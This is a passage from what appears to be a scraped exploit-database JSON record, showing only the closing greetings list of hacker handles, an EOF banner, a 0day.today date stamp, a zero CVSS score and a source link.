lesson :) \r\n~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous\r\n~ bius, lapets, ghoz, t4mbun_hacker, NpR, h4ntu, thama\r\n-------------------------------- [ EOF ]----------------------------------\r\n\r\n\r\n\r\n\n# 0day.today [2018-04-14] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/642"}]}